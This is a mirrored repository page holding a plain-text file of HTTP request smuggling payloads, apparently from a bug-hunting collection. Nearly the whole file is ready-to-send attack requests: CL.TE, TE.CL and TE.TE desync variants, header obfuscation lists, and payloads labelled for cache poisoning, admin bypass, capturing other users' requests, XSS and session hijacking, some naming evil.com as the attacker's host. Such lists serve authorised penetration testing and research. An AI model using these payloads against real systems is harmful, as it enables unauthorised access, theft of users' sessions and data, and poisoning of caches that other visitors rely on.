0x5t4l1n/hunting
1
0
Fork 0
mirror of https://github.com/0x5t4l1n/hunting.git synced 2026-05-26 19:36:33 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
9e0ef89ce46c78996781f86a0988af790e85df9b
hunting/HTTP-Request-Smuggling/http-request-smuggling-payloads.txt
T

527 lines
7.3 KiB
Plaintext
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
# HTTP Request Smuggling Payloads
# CL.TE (Content-Length vs Transfer-Encoding)
# Front-end uses Content-Length, back-end uses Transfer-Encoding
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 13
Transfer-Encoding: chunked
0
SMUGGLED
---
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 6
Transfer-Encoding: chunked
0
G
---
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
---
# TE.CL (Transfer-Encoding vs Content-Length)
# Front-end uses Transfer-Encoding, back-end uses Content-Length
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 3
Transfer-Encoding: chunked
8
SMUGGLED
0
---
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked
5e
POST /admin HTTP/1.1
Host: vulnerable-website.com
Content-Length: 10
x=
0
---
# TE.TE (Transfer-Encoding obfuscation)
# Both servers handle Transfer-Encoding but one can be obfuscated
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked
Transfer-Encoding: cow
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
---
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked
Transfer-Encoding: x
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
---
# Transfer-Encoding obfuscation variants
Transfer-Encoding: chunked
Transfer-Encoding: xchunked
Transfer-Encoding: chunked
Transfer-Encoding: x
Transfer-Encoding: chunked
Transfer-encoding: chunked
Transfer-Encoding: chunked
Transfer-Encoding: chunked;
Transfer-Encoding: chunked,
Transfer-Encoding: identity
Transfer-Encoding: identity, chunked
Transfer-Encoding: chunked, identity
Transfer-Encoding: chunked
Transfer-Encoding: identity
Transfer-Encoding: chunked
Transfer-Encoding : chunked
Transfer-Encoding:chunked
Transfer-Encoding:
chunked
Transfer-Encoding:
chunked
[space]Transfer-Encoding: chunked
Transfer-Encoding[space]: chunked
Transfer-Encoding:[space]chunked
Transfer-Encoding: chu nked
Transfer-Encoding: chunk ed
Transfer-Encoding: chun\x0bked
# CL.CL (Duplicate Content-Length)
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 8
Content-Length: 7
12345
SMUGGLED
---
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 8
Content-Length: 9
test=1
SMUGGLED
---
# Cache poisoning via request smuggling
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 130
Transfer-Encoding: chunked
0
GET /static/script.js HTTP/1.1
Host: vulnerable-website.com
Content-Length: 10
x=
---
# Bypassing front-end security controls
POST /login HTTP/1.1
Host: vulnerable-website.com
Content-Length: 100
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-For: 127.0.0.1
Content-Length: 10
x=
---
# Capturing other users' requests
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 230
Transfer-Encoding: chunked
0
POST /log HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 1000
comment=
---
# XSS via request smuggling
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 150
Transfer-Encoding: chunked
0
GET /search?q=<script>alert(1)</script> HTTP/1.1
Host: vulnerable-website.com
Content-Length: 10
x=
---
# Web cache deception
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 180
Transfer-Encoding: chunked
0
GET /static/include.js HTTP/1.1
Host: vulnerable-website.com
X-Ignore: X
GET /account HTTP/1.1
Host: vulnerable-website.com
---
# Exploiting different chunk handling
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked
96
POST /admin HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
csrf=token&action=delete
0
---
# Timing-based detection payload
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked
1
Z
Q
---
# Header injection for smuggling
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 200
Transfer-Encoding: chunked
0
GET / HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-Host: evil.com
Content-Length: 10
x=
---
# Session hijacking
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 250
Transfer-Encoding: chunked
0
POST /account/update HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 150
email=attacker@evil.com&session=
---
# Smuggling with newlines
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding:
chunked
Content-Length: 4
5c
SMUGGLED
0
---
# Smuggling with tabs
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
Content-Length: 4
5c
SMUGGLED
0
---
# HTTP/2 downgrade smuggling
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
Content-Length: 4
0
SMUGGLED
---
# Chunk size obfuscation
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
0000000000000000000a
SMUGGLED123
0
---
# Negative Content-Length
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: -1
Transfer-Encoding: chunked
0
SMUGGLED
---
# Very large Content-Length
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 999999999
Transfer-Encoding: chunked
0
SMUGGLED
---
# Mixed line endings
POST / HTTP/1.1\r\n
Host: vulnerable-website.com\r\n
Content-Length: 4\r\n
Transfer-Encoding: chunked\n
\r\n
5c\r\n
SMUGGLED\r\n
0\r\n
\r\n
---
# Unicode in headers
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
TransferEncoding: identity
0
SMUGGLED
---
# Multiple Host headers
POST / HTTP/1.1
Host: vulnerable-website.com
Host: evil.com
Content-Length: 4
Transfer-Encoding: chunked
0
SMUGGLED
---
# Smuggling to internal endpoints
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 150
Transfer-Encoding: chunked
0
GET /internal/admin HTTP/1.1
Host: localhost
X-Forwarded-For: 127.0.0.1
Content-Length: 10
x=
---
# Cookie injection via smuggling
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 180
Transfer-Encoding: chunked
0
GET / HTTP/1.1
Host: vulnerable-website.com
Cookie: session=stolen_session_here
Content-Length: 10
x=
---
# Authorization bypass
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 200
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: vulnerable-website.com
Authorization: Bearer admin_token_here
Content-Length: 10
x=
---
# CRLF injection in chunks
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
0\r\n
\r\n
GET /admin HTTP/1.1\r\n
Host: vulnerable-website.com\r\n
\r\n
---
# Smuggling via Content-Type
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked
0
SMUGGLED
---
# Request line injection
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 150
Transfer-Encoding: chunked
0
GPOST /admin HTTP/1.1
Host: vulnerable-website.com
Content-Length: 10
x=
---
# Protocol smuggling (HTTP/1.1 -> HTTP/2)
POST / HTTP/1.1
Host: vulnerable-website.com
Upgrade: h2c
Connection: Upgrade, HTTP2-Settings
HTTP2-Settings: AAMAAABkAAQAAP__
Content-Length: 4
Transfer-Encoding: chunked
0
SMUGGLED
Reference in New Issue View Git Blame Copy Permalink